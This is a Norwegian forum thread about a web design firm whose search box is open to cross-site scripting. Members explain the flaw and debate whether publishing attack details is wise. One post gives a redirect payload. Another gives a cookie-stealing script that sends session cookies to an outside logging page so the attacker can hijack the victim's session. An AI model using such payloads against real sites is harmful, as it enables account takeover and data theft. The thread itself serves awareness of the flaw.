Litt smålig irritert på webdesign firma her

skogtrollet

Medlem
Fant et webdesign/utvikler firma på nett som har ganske heftige priser. Men jeg antar de er "profesjonell". Uansett, det jeg reagerte på var at de ikke filtrerer vekk html i søkeboksen på nettstedet sitt. Hva annet tull kan de ha gjort da?

Og med de prisene de bruker, følte jeg at jeg ble litt smålig irritert. Tenk på alle som har kjøpt en tjeneste fra dem.
 

tyr897

Medlem
Regner med skogtrollet tenker på filtrering av input.
Altså hvis du f.eks. søker etter

"><script type="text/javascript">window.location.href = 'http://www.youtube.com/watch?v=oHg5SJYRHA0';</script>

vil du bli sendt vekk fra siden og avgårde til youtube.
Feil av denne typen ligger på nybegynner stadiet, ihvertfall så opplagte, og skal være sikret mot. Ville nok blitt ganske skeptisk selv, de har helt sikkert ikke den peneste kodepraksisen.
 
Sist redigert:

Bjørnar

Gründer
kan heller ikke se at dette er noe å irritere seg over. at firmaet ikke har god validering, betyr vel bare at man bør ligge unna selskapet. løft hodet, se fremover!
 

tyr897

Medlem
Dette er et problem som kalles XSS, og kan være potensielt langt mer skadelig enn man i utgangspunktet skulle tro. Eksempelet mitt var selvsagt ikke særlig farlig, så la oss se for oss et mer kritisk scenario.

La oss si at dette webutviklingsfirmaet har en kundekonto som du er logget inn på når du er på siden. Du besøker (noenlunde) samtidig webforumet.no i god tro, men Kenneth har tatt på seg sin svarte hatt den dagen. Nederst på webforumet ligger det nå en iframe med src til http://www.fiktivtwebfirma.no/sok?q="><script type="text/javascript">new Image().src = "http://webforumet.no/cookielog.php?c=" + encodeURI(document.cookie);</script>
Kenneth sitter online og venter på at cookie dataene skal komme. Han stjeler session IDen din, går til fiktivtwebfirma.no med en forfalsket kake og er logget inn som deg, med alle dine rettigheter og tilgang til informasjon.

Jeg ville aldri akseptert en løsning der mine kundedata var lett tilgjenglig med litt teknisk innsikt. God validering er alfa og omega. Man kan lese mer om XSS på wikipedia, Cross-site scripting - Wikipedia, the free encyclopedia.
 

kongen

kongemedlem
tyr897; Er dette utbredt?

Hva med dette forumet? Andre kjente forum? Hva med open source blogger/cms/nettbutikkløsninger (wordpress/joomla/oscommerce/drupal osv).

Burde du ikke starte et datasikkerhetsfirma og ta deg kraftig betalt?

Hvis dette er "farlig" med hensyn til å hacke seg inn i systemer, hvorfor da legge det åpent ut for andre å lære seg det? Er det ikke bedre å la være å gå i dype detaljer om hvordan det gjøres?

Kreditt for nyttig info, men litt "skummelt" å legge ut selve detaljene hvordan det gjøres for andre til å utnytte seg av det...
 
Sist redigert:

skogtrollet

Medlem
Dette problemet er ganske utbredt. Og nye php utviklere bare fortsetter og fortsetter, å produsere sårbar kode.

ITpro: Sikkerhetshull på 80 store nettsteder påvist - Skremmende lett å manipulere nettsteder

Poenget, kongen, er at disse såbarhetene er blitt utnyttet siden 1999/2000, og uansett om vi beskriver hvordan angrepet gjøres eller ikke, vil data kyndige mennesker fortsette å gjøre ugang. Det man derimot oppnår ved å publisere mye informasjon om problemet, er at det når ut til mange folk. Det når ut også til hobby utviklere, som så deretter begynner å skrive sikker kode.
 

kongen

kongemedlem
Oj, det var en del utbredt i Norge også ja i følge ITpro...

Men hva med Wordpress/Joomla/Drupal/osCommerce/vBulletin/phpBB/SimpleForum og slike open source løsninger? Finnes det en oversikt over dette?
 

skogtrollet

Medlem
Alle disse har hatt en rekke sårbarheter opp igjennom tida. Det er derfor folk maser om at du må oppdatere til nyeste versjon. Ellers skjer det som hendte med Ida Wulf.
 
Topp